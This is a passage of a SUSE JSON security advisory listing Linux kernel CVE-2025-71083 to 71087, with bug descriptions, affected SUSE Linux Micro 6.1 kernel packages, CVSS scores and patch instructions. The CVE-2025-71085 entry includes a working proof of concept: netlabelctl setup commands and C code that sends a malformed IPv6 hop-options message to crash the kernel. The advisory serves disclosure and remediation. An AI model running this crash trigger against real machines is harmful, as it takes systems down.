"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
